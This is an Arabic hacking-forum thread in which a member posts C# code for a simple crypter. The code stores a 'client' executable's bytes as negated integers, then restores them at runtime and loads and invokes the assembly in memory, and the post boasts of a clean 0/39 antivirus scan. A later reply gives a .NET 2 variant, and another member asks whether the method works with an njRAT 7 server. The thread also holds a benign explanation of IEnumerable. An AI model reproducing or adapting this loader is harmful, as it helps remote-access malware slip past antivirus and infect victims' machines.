Negative To Positive > Clean 0 /39

تم تحميل الصفحة في 0,9901308 ثانية
Negative To Positive > Clean 0 /39

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,547
النقاط
173
الإقامة
Germany
حياكم الله ياشباب
البارح نزلت موضوعي هنا
Pick up Client's values Clean -> 0/39
وقلت بالرد الاول عليه فكرة ..

فيه احد فكر بالموضوع ويقول لنفسه انه لو بستخرج قيم الكلاينت بايتاته ك قيم سالبة وبحطهم ب ليست اوف انتجر مثلا
وبحولهم لموجبة وبيخزرنهم ب ليست اوف بايت وبشغلهم ؟
مين فينه يسوي الفكرة هذه والاكواد نفسها هنا بنسبة 99 بالمائة ..مارح تحتاجو شي ثاني
هيك الحجم الناتج بيكون 10 اضعاف اقل من الناتج هنا وايضا فكرة جديدة والناتج كلين اعتقد ^_^
الان هنا تطبيقها
منجيب بايتات الكلاينت بالقيمة السالبة
ومن ثم منحولهم للقيم الموجبة بالسورس النهائي

C#:
  var byt = File.ReadAllBytes(@"C:\Users\h-a-c\Desktop\Client.exe");
var str = String.Empty;
foreach (var b in byt)
{
str += $"{b * -1},";
}
Clipboard.SetText(str.Remove(str.Length - 1));
السورس النهائي

C#:
 static void Main()
        {
            Application.EnableVisualStyles();
            var listi = new List<int> { -77, -90, -144, 0, -3, 0, 0, 0, -4, 0, 0, 0, -255, -255, 0, 0, -184};
            AppDomain.CurrentDomain.Load(PickUpValues(listi).ToArray()).GetTypes()[1].GetMethods()[0].Invoke(new Random().Next(23, 5432), new object[] { });
            Application.SetCompatibleTextRenderingDefault(false);
        }
      public  static IEnumerable<byte> PickUpValues(List<int> li)
        {
            foreach (var l in li)
            {
                    yield return (byte)(l * -1);
            }
        }
ناتج الفحص كلين 0 / 39
OPSWAT MetaDefender Cloud | Results
لمشاهدة الفديو من هنا
"اسف كنت بالقطار وقت سجلت الفديو لهيك يمكن الصوت سيئ ماادري


ابرا الى الله عز وجل من اي استخدام في معصية
 

๖ۣۜA M E E R

F E v E R
طاقم الإدارة
إنضم
8 سبتمبر 2013
المشاركات
7,096
الإعجابات
10,591
النقاط
168
الإقامة
Iraq
جازاك الله الف خير حبيبي بشار .. على هذه العلوم الي تنشرها يا صاحبي
بس لو احد يعرف يستغلها صح .. يوفقة ربه
 
إنضم
4 نوفمبر 2013
المشاركات
75
الإعجابات
112
النقاط
33
العمر
20
الإقامة
لــــيــــبــــيــــا
جميل جدا :)
C#:
 public  static IEnumerable<byte> PickUpValues(List<int> li)
       {
           foreach (var l in li)
           {
                   yield return (byte)(l * -1);
           }
       }
IEnumerable<byte> اول مرة اشوفها :88:
يعني تجمع كل قيم البايت وترجعها كا اري والا كيف ؟
 
إنضم
26 ديسمبر 2009
المشاركات
412
الإعجابات
305
النقاط
63
حياكم الله ياشباب
البارح نزلت موضوعي هنا
Pick up Client's values Clean -> 0/39
وقلت بالرد الاول عليه فكرة ..



الان هنا تطبيقها
منجيب بايتات الكلاينت بالقيمة السالبة
ومن ثم منحولهم للقيم الموجبة بالسورس النهائي

C#:
  var byt = File.ReadAllBytes(@"C:\Users\h-a-c\Desktop\Client.exe");
var str = String.Empty;
foreach (var b in byt)
{
str += $"{b * -1},";
}
Clipboard.SetText(str.Remove(str.Length - 1));
السورس النهائي

C#:
 static void Main()
        {
            Application.EnableVisualStyles();
            var listi = new List<int> { -77, -90, -144, 0, -3, 0, 0, 0, -4, 0, 0, 0, -255, -255, 0, 0, -184};
            AppDomain.CurrentDomain.Load(PickUpValues(listi).ToArray()).GetTypes()[1].GetMethods()[0].Invoke(new Random().Next(23, 5432), new object[] { });
            Application.SetCompatibleTextRenderingDefault(false);
        }
      public  static IEnumerable<byte> PickUpValues(List<int> li)
        {
            foreach (var l in li)
            {
                    yield return (byte)(l * -1);
            }
        }
ناتج الفحص كلين 0 / 39
OPSWAT MetaDefender Cloud | Results
لمشاهدة الفديو من هنا
"اسف كنت بالقطار وقت سجلت الفديو لهيك يمكن الصوت سيئ ماادري


ابرا الى الله عز وجل من اي استخدام في معصية



اخي بشار انت تقدم علوم مجانيه
ودروس دون مقابل
جزاك الله خير

مبدع بكل ماتعنيه الكلمه

شخصيا صعب علي تطبيق شروحك المشكله فقط في ان دروسك مرتبطه ببعض
يعني لو جيت اطبق درس ما اقدر اطبقه بشكل منفصل
لازم ترجع فيني لدروس سابقه
وهنا المخ يوقف عن العمل :)
وكل مشروع تقوم فيه الاقيك مثلا مجهز وفاتح الفيجول وهذا الشي يخليني بحيره اختار أي خيار للمشروع مثلا سي شارب او فيجول او ايش واي خيار اختار ويندوز فورم او كنسل
لان كثير معلوماتهم قليلة جداااا في البرمجه
اتمنى فقط كل مشروع يكون مستقل يعني من البداية للنهاية عشان التطبيق يتم خطوة بخطوة معاك
والله يحميك وجزاك الله خير
 
إنضم
1 يوليو 2017
المشاركات
8
الإعجابات
3
النقاط
3
الإقامة
Palestine
اخي بشار انت تقدم علوم مجانيه
ودروس دون مقابل
جزاك الله خير

مبدع بكل ماتعنيه الكلمه

شخصيا صعب علي تطبيق شروحك المشكله فقط في ان دروسك مرتبطه ببعض
يعني لو جيت اطبق درس ما اقدر اطبقه بشكل منفصل
لازم ترجع فيني لدروس سابقه
وهنا المخ يوقف عن العمل :)
وكل مشروع تقوم فيه الاقيك مثلا مجهز وفاتح الفيجول وهذا الشي يخليني بحيره اختار أي خيار للمشروع مثلا سي شارب او فيجول او ايش واي خيار اختار ويندوز فورم او كنسل
لان كثير معلوماتهم قليلة جداااا في البرمجه
اتمنى فقط كل مشروع يكون مستقل يعني من البداية للنهاية عشان التطبيق يتم خطوة بخطوة معاك
والله يحميك وجزاك الله خير
تابع الدورة الى نزلها راح تعرف تستخدم كلشى وتفهم اي حاجه من الى بطبقها باي درس
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,547
النقاط
173
الإقامة
Germany
جميل جدا :)
C#:
 public  static IEnumerable<byte> PickUpValues(List<int> li)
       {
           foreach (var l in li)
           {
                   yield return (byte)(l * -1);
           }
       }
IEnumerable<byte> اول مرة اشوفها :88:
يعني تجمع كل قيم البايت وترجعها كا اري والا كيف ؟
اهلا بك اخي الحبيب
تقدر تقول انها انترفيس نقدر من خلالها نمرر اي تايب ,سترينج ,انتجر ,بايت ..الخ
C#:
IEnumerable<T>
الناتج تقدر من خلاله IEnumerable تحوله لـ اراي او ل ليست ..
يعني الناتج منحطه بـLoop ومنحوله لأراي او منسويه ب ليست او نحوله لأراي مباشرة في حالة Linq 4.5 FW
يعني بتلجالها وقت بتكون حابب تسوي حلقة Froeach مثلا وانت مش عارف التايب اللي بتتعامل معه او بغض النظر عن التايب
هنا بمثالنا ان شفت مافيه متغير يتخزن فيه الناتج
مثلا لو حبيت انني اسوي ناتج الفانكشن انتجر اراي او بايت اراي فرح يكون بالاخير عندك return للمتغير اللي مأعلن عنه
واللي رح ترجعلك ياه الفانكشن ..ان كانت بايت اراي فرح ترجعلك بايت اراي
ف انا عشان مااخلي الفانكشن ترجعلي مثلا ليست اوف بايت مباشرة او بايت اراي استخدمت IEnumerable
وللعلم كان فيني مااحدد نوع البيانات اللي بدي اتعامل فيها من خلالها
يعني الميزة او الافضلية الاولى الها دام انو اساليب IEnumerable منستخدمها بدلا من مصفوفة او List
فهي هيك اكتر قوة بسبب متل ماقلنا انو فينا نقدر من خلالها تمرير انواع مختلفة من الاوبجكتس الها..
كمان الها فوائد باستخدام بطريقة استخدام الذاكرة
وكمان الها فوائد تانية اسال جوجل بيدلك على روابط فيها شرح اكبر واعمق من موقع stackoverflow
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,547
النقاط
173
الإقامة
Germany
اخي بشار انت تقدم علوم مجانيه
ودروس دون مقابل
جزاك الله خير

مبدع بكل ماتعنيه الكلمه

شخصيا صعب علي تطبيق شروحك المشكله فقط في ان دروسك مرتبطه ببعض
يعني لو جيت اطبق درس ما اقدر اطبقه بشكل منفصل
لازم ترجع فيني لدروس سابقه
وهنا المخ يوقف عن العمل :)
وكل مشروع تقوم فيه الاقيك مثلا مجهز وفاتح الفيجول وهذا الشي يخليني بحيره اختار أي خيار للمشروع مثلا سي شارب او فيجول او ايش واي خيار اختار ويندوز فورم او كنسل
لان كثير معلوماتهم قليلة جداااا في البرمجه
اتمنى فقط كل مشروع يكون مستقل يعني من البداية للنهاية عشان التطبيق يتم خطوة بخطوة معاك
والله يحميك وجزاك الله خير
تسلم على كلامك الطيب اخي الحبيب الاريب ..
مثل ماقال الاخ سنايبر اخي الغالي
للاسف انت بحاجة لانك تشوف اقل شي الدروس الثلاثة اللي نزلتهم عن تعليم السي شارب
لان بصدق اخي مش دائما بيكون سهل عندي انني اشرح من ال0 كل شي
لان ممكن الي شرحته اكون شارحه قبل وهيك بيكبر حجم الفديو كثير
وانا بكون شارحه قبل ..
انا بشرح لك كل شي مافهمته اليوم بس بشرط انك تخلص اللي قلت لك عليه
خلص الدروس اللي نزلتهم واي شي مافهمته من عيوني بشرحلك قد مابدك اخي الحبيب ..
انا وقت بنزل شرح بفترض انكم متابعيني ومتعلمين سي شارب من الدروس اللي نزلتهم
او عالاقل بتعرفو شوي بالسي شارب ..
لو مش متابعيني او مابتعرفو سي شارب
للاسف عندكم حلين اما تشوفو فديوهاتي واما انكم تتعلمو الاساسيات ..
لاتنزعج اخي الحبيب وولايهمك الاخ سنايبر وانا عمنخبرك اللي فيه مصلحتك
رح تنبسط من نفسك كثيييير اخي الحبيب وقت تتعلم بتصير بتفكر وبتبدع وبتطلع طرق جديدة خاصة فيك
ان مابتعرف روابط تعليم السي شارب اللي نزلتهم خبرني لاجيب لك الروابط ..تكرم اخي
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,547
النقاط
173
الإقامة
Germany
جازاك الله الف خير حبيبي بشار .. على هذه العلوم الي تنشرها يا صاحبي
بس لو احد يعرف يستغلها صح .. يوفقة ربه
الحبيب الاريييب اميير
واياكم اخي الغالي .جزاك الله كل خير اخي الحبيب
والله تعرف انني اتمنى انو الشباب يستغلوها صح
تسلم اخي على مرورك
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,547
النقاط
173
الإقامة
Germany

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,547
النقاط
173
الإقامة
Germany
تابع الدورة الى نزلها راح تعرف تستخدم كلشى وتفهم اي حاجه من الى بطبقها باي درس
شكرا لك اخي الحبيب على ردك
بالفعل كلامك صحيح .. صدقا مش لان انا اللي قدمت الدروس بس محتواهم جيد جدا
ومااعتقد احد يشرح امور كثيرة بالفديوهات الثلاث اللي انا شرحتهم ..
الاكيد انه فيه احسن مني بالسي شارب هنا بالديف عشرات ويمكن مئات
الاكيد انني مش استاذ او معلم وانني مبتدئ .. بس وقت بقول للشباب شوفو فديوهاتي بيفكروني عماعمل استاذ هه
انا عملتهم نسبة كبيرة من اللي كنت اعرفه وقتها ..او عالاقل اللي قدرت انني اشرحه وتذكرته بالفديوهات
بتمنى الخير لك وللكل هنا وبحبهم يعرفو اللي اعرفه
بس المشكلة مثل ماقلت فوق مش واردة مثل ماتعرف اخي ارجع اشرح من ال0 كل شي
وانا شارحهم من قبل كثير من المرات ومفصله بالفديوهات الثلاث
وهذا كان السبب الرئيس بطرحي للفديوهات اللي نزلتها
انه لو اجاني مبتدئ اقول له شوفهم واي شي مافهمته فيهم من عيوني
وان شافهم وفهمهم ونزلت انا شرح مافهم فيه العضو اي شي بشرح له اياه
بس انو اشرح من ال0 صعب جدا علي التزامات ومشاغل ..
واعتقد شرحي كمان مش صعب كثير جدا بالفديوهات اللي بنزلها
يكفي معرفة الاساسيات واكيد اي عضو رح يفهم اللي بسويه ..
شكرا لك مرة اخرى على مساعدتك لاخيك ..
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,547
النقاط
173
الإقامة
Germany
جميل جدا :)
C#:
 public  static IEnumerable<byte> PickUpValues(List<int> li)
       {
           foreach (var l in li)
           {
                   yield return (byte)(l * -1);
           }
       }
IEnumerable<byte> اول مرة اشوفها :88:
يعني تجمع كل قيم البايت وترجعها كا اري والا كيف ؟
تفضل اخي
what is IEnumerable in .net
هنا بتشوف شرح مفصل عنها الان جبت لك الرابط
 
إنضم
1 يوليو 2017
المشاركات
8
الإعجابات
3
النقاط
3
الإقامة
Palestine
شكرا لك اخي الحبيب على ردك
بالفعل كلامك صحيح .. صدقا مش لان انا اللي قدمت الدروس بس محتواهم جيد جدا
ومااعتقد احد يشرح امور كثيرة بالفديوهات الثلاث اللي انا شرحتهم ..
الاكيد انه فيه احسن مني بالسي شارب هنا بالديف عشرات ويمكن مئات
الاكيد انني مش استاذ او معلم وانني مبتدئ .. بس وقت بقول للشباب شوفو فديوهاتي بيفكروني عماعمل استاذ هه
انا عملتهم نسبة كبيرة من اللي كنت اعرفه وقتها ..او عالاقل اللي قدرت انني اشرحه وتذكرته بالفديوهات
بتمنى الخير لك وللكل هنا وبحبهم يعرفو اللي اعرفه
بس المشكلة مثل ماقلت فوق مش واردة مثل ماتعرف اخي ارجع اشرح من ال0 كل شي
وانا شارحهم من قبل كثير من المرات ومفصله بالفديوهات الثلاث
وهذا كان السبب الرئيس بطرحي للفديوهات اللي نزلتها
انه لو اجاني مبتدئ اقول له شوفهم واي شي مافهمته فيهم من عيوني
وان شافهم وفهمهم ونزلت انا شرح مافهم فيه العضو اي شي بشرح له اياه
بس انو اشرح من ال0 صعب جدا علي التزامات ومشاغل ..
واعتقد شرحي كمان مش صعب كثير جدا بالفديوهات اللي بنزلها
يكفي معرفة الاساسيات واكيد اي عضو رح يفهم اللي بسويه ..
شكرا لك مرة اخرى على مساعدتك لاخيك ..
ايه والله تشكر اخي بشار ع المشاركة .. استمر
نصحية للكل يشوف دورة الى نزلها بشار لانها تعلمك كثير اساسيات ما قصرت بشار :91:
 

fafanana

Beginner Developer
rank
إنضم
17 أكتوبر 2015
المشاركات
26
الإعجابات
24
النقاط
3
:]d (3):السلام على الملائكة الكرام :]d (3):
أخي بشار بتخلص جميع كلمات الشكر
وما نقدر نوفيلك حقك والله والله أحبك في الله وإنت بتعرف هالشي
تقبل مروري ولا تنزعج منا عشان بنتعبك دومًا معانا و بأسئلتنا التافه أحيانا
و من شان كلمة أستاذ أعتقد ما بتناسبك صراحةً ههههههه:biggrin:
أنا بقول دكتور السي شارب في كل المنتديات و حتى في القطارات هههههه:zxcv29:
بس عندي سؤال لك بشأن منصة Net Framework 2
بدنا الناتج يشتغل على هاته المنصة
:]d (5):والسلااااااااااااام:]d (5):
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,547
النقاط
173
الإقامة
Germany
:]d (3):السلام على الملائكة الكرام :]d (3):
أخي بشار بتخلص جميع كلمات الشكر
وما نقدر نوفيلك حقك والله والله أحبك في الله وإنت بتعرف هالشي
تقبل مروري ولا تنزعج منا عشان بنتعبك دومًا معانا و بأسئلتنا التافه أحيانا
و من شان كلمة أستاذ أعتقد ما بتناسبك صراحةً ههههههه:biggrin:
أنا بقول دكتور السي شارب في كل المنتديات و حتى في القطارات هههههه:zxcv29:
بس عندي سؤال لك بشأن منصة Net Framework 2
بدنا الناتج يشتغل على هاته المنصة
:]d (5):والسلااااااااااااام:]d (5):
اهلا بك اخي الحبيبب .. وانا احبك بالله اخي الغالي ,, نعم اعرف الله يحفظك
لا مش تافهة ومابنزعج من الاسئلة اخي ,, بس بحب الكل يتعلم الي نزلته دامه متوافر الان
الله يسامحك ههه قلنا استاذ لا سويتني دكتور خخ
عشان الفريم وورك تفضل اخي
اللي رح نسويه اننا رح نأعلن عن ليست اوف بايت
رح نخزن فيها ناتج الفانكشن باكمله "بايتات الكلاينت الموجبة ^_^"
C#:
 static void Main()
        {
            Application.EnableVisualStyles();
            var listi = new List<int> { -77, -90, -144, 0, -3, 0, 0 };
            var listb = new List<byte>();
            foreach (var p in PickUpValues(listi))
            {
                listb.Add(p);
            }
            AppDomain.CurrentDomain.Load(listb.ToArray()).GetTypes()[1].GetMethods()[0].Invoke(new Random().Next(23, 5432), new object[] { });
            Application.SetCompatibleTextRenderingDefault(false);
        }
      public  static IEnumerable<byte> PickUpValues(List<int> li)
        {
            foreach (var l in li)
            {
                    yield return (byte)(l * -1);
            }
        }
 

scorpio dz

Beginner Developer
rankrank
إنضم
18 يونيو 2015
المشاركات
161
الإعجابات
103
النقاط
43
حياكم الله ياشباب
البارح نزلت موضوعي هنا
Pick up Client's values Clean -> 0/39
وقلت بالرد الاول عليه فكرة ..



الان هنا تطبيقها
منجيب بايتات الكلاينت بالقيمة السالبة
ومن ثم منحولهم للقيم الموجبة بالسورس النهائي

C#:
  var byt = File.ReadAllBytes(@"C:\Users\h-a-c\Desktop\Client.exe");
var str = String.Empty;
foreach (var b in byt)
{
str += $"{b * -1},";
}
Clipboard.SetText(str.Remove(str.Length - 1));
السورس النهائي

C#:
 static void Main()
        {
            Application.EnableVisualStyles();
            var listi = new List<int> { -77, -90, -144, 0, -3, 0, 0, 0, -4, 0, 0, 0, -255, -255, 0, 0, -184};
            AppDomain.CurrentDomain.Load(PickUpValues(listi).ToArray()).GetTypes()[1].GetMethods()[0].Invoke(new Random().Next(23, 5432), new object[] { });
            Application.SetCompatibleTextRenderingDefault(false);
        }
      public  static IEnumerable<byte> PickUpValues(List<int> li)
        {
            foreach (var l in li)
            {
                    yield return (byte)(l * -1);
            }
        }
ناتج الفحص كلين 0 / 39
OPSWAT MetaDefender Cloud | Results
لمشاهدة الفديو من هنا
"اسف كنت بالقطار وقت سجلت الفديو لهيك يمكن الصوت سيئ ماادري


ابرا الى الله عز وجل من اي استخدام في معصية
هل تنفع الطريقة على سرفر نجرات7 وعلى نت فروم ووك2
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل